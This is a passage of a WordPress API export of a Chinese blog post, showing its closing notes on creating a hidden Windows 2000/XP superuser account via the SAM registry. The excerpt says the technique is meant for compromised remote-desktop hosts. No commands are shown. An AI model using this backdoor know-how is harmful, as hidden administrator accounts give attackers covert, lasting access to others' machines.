\/>\n\u800c\u4e14\u8fd8\u5177\u6709\u8d85\u7ea7\u7528\u6237\u7684\u6743\u9650\u3002\u5177\u4f53\u6211\u4e5f\u8bf4\u4e0d\u660e\u767d\uff0c\u5927\u5bb6\u6743\u4e14\u8fd9\u4e48\u7406\u89e3\u5427\u3002<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n\u4e94\u3001\u6ce8\u610f\u7684\u51e0\u70b9\u4e8b\u9879\uff1a<\/p>\n<p>1\u3001\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u5efa\u7acb\u4ee5\u540e\uff0c\u5728\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u548c\u547d\u4ee4\u884c\u4e0b\u5747\u770b\u4e0d\u5230\u8fd9\u4e2a\u7528\u6237\uff0c\u4f46\u8fd9\u4e2a\u7528\u6237\u5374\u5b58\u5728\u3002<\/p>\n<p>2\u3001\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u5efa\u7acb\u4ee5\u540e\uff0c\u5c31\u4e0d\u80fd\u518d\u4fee\u6539\u5bc6\u7801\u4e86\uff0c\u56e0\u4e3a\u4e00\u65e6\u4fee\u6539\u5bc6\u7801\uff0c\u8fd9\u4e2a\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u5c31\u4f1a\u66b4\u9732\u5728\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\uff0c<br \/>\n\u800c\u4e14\u4e0d\u80fd\u5220\u9664\u3002<\/p>\n<p>3\u3001\u5982\u5728\u672c\u673a\u4e0a\u8bd5\u9a8c\u65f6\uff0c\u6700\u597d\u7528\u7cfb\u7edf\u81ea\u5e26\u7684\u5907\u4efd\u5de5\u5177\u5148\u5907\u4efd\u597d\u672c\u673a\u7684\u201c\u7cfb\u7edf\u72b6\u6001\u201d\u4e3b\u8981\u662f\u6ce8\u518c\u8868\u7684\u5907\u4efd\uff0c\u56e0\u4e3a\u672c\u4eba\u505a\u8bd5\u9a8c\u65f6\uff0c<br \/>\n\u66fe\u51fa\u73b0\u8fc7\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u770b\u4e0d\u5230\u4efb\u4f55\u7528\u6237\uff0c\u7ec4\u4e2d\u4e5f\u770b\u4e0d\u5230\u4efb\u4f55\u7ec4\u7684\u73b0\u8c61\uff0c\u4f46\u5b83\u4eec\u5374\u5b58\u5728\u3002\u5e78\u597d\u6211\u6709\u5907\u4efd,\u5475\u5475\u3002<br \/>\nSAM\u952e\u662f\u6bd5\u7adf\u7cfb\u7edf\u6700\u654f\u611f\u7684\u90e8\u4f4d\u3002<\/p>\n<p>4\u3001\u672c\u65b9\u6cd5\u57282000\/XP\u4e0a\u6d4b\u8bd5\u901a\u8fc7\uff0c\u672a\u5728NT\u4e0a\u6d4b\u8bd5\u3002\u672c\u65b9\u6cd5\u4ec5\u4f9b\u7814\u7a76\uff0c\u8bf7\u52ff\u5c06\u672c\u65b9\u6cd5\u7528\u4e8e\u7834\u574f\u4e0a\uff0c\u5229\u7528\u672c\u65b9\u6cd5\u9020\u6210\u4e25\u91cd\u540e\u679c\u8005\uff0c<br \/>\n\u7531\u4f7f\u7528\u8005\u8d1f\u8d23\uff0c\u672c\u4eba\u6982\u4e0d\u8d1f\u8d23\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u5982\u4f55\u5728\u56fe\u5f62\u754c\u9762\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237 \u56fe\u5f62\u754c\u9762\u4e0b\u9002\u7528\u672c\u5730\u6216\u5f003389\u7ec8\u7aef\u670d\u52a1\u7684\u8089\u9e21\u4e0a\u3002\u4e0a\u9762\u6211\u63d0\u5230\u7684\u90a3\u4f4d\u4f5c\u8005\u8bf4\u7684 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_crdt_document":"","footnotes":""},"categories":[],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/www.mudone.com\/index.php?rest_route=\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mudone.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mudone.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mudone.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mudone.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=309"}],"version-history":[{"count":0,"href":"https:\/\/www.mudone.com\/index.php?rest_route=\/wp\/v2\/posts\/309\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.mudone.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mudone.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mudone.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}